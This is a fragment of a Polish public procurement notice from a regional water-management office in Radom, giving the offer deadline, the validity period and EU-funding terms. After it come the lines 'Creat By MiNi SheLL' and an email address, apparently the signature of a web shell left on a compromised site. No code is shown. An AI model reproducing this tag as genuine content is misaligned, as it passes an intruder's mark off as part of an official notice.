<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2012 godzina 10:00, miejsce: Sekretariat Wojewódzkiego Zarząd Melioracji i Urządzeń Wodnych w Warszawie Oddział w Radomiu ul. Wernera 4a 26-600 Radom - pokój nr 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com